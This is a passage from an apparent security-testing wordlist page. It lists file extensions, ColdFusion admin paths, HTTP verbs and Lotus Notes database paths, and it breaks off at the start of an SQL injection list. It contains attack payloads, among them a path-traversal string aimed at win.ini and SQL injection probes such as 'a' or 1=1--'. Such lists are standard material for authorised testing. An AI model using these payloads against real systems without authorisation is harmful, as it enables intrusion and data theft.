.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
